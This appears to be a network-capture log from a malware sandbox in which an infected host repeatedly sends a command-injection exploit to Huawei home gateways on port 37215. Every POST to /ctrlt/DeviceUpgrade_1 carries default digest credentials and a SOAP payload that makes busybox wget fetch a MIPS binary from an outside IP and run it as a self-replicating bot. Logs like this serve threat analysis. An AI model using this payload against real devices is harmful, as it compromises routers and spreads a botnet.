6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  985192.168.2.1351626157.36.165.20937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.406366110 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  986192.168.2.1357434197.218.145.12037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.406419039 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  987192.168.2.13580148.232.186.16737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.406434059 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  988192.168.2.1338848197.252.179.17937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.406546116 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  989192.168.2.1334340197.118.236.25037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.406559944 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  990192.168.2.1342130154.109.96.16337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.406573057 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  991192.168.2.1350130157.104.203.2537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.406588078 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  992192.168.2.1355410157.89.111.23537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.406598091 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  993192.168.2.1349196153.231.29.11037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.411427975 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  994192.168.2.1356522197.131.14.4937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.411472082 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  995192.168.2.135145041.152.96.20537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.411571026 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
